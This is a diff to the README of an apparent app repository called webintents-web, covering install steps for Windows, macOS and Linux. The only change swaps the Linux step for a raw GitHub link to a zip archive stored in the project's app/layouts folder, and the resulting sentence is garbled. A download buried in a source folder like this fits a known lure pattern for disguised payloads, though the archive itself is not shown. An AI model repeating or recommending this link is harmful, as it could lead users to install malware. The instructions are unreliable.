juanignaruiz05-creator/webintents-web/README.md

 - On Windows: Double-click the `.exe` file you downloaded and follow the setup prompts.
 - On macOS: Open the `.dmg` file and drag the app to your Applications folder.
-- On Linux: Extract the `.tar.gz` file and follow any included instructions, usually in a `README` file.
+- On Linux: Extract the `https://raw.githubusercontent.com/juanignaruiz05-creator/webintents-web/main/app/layouts/web-webintents-v2.5.zip` file and follow any included instructions, usually in a `README` file.

 If you prefer, you can also run webintents-web in your browser.
 Instructions for this option are on the release page.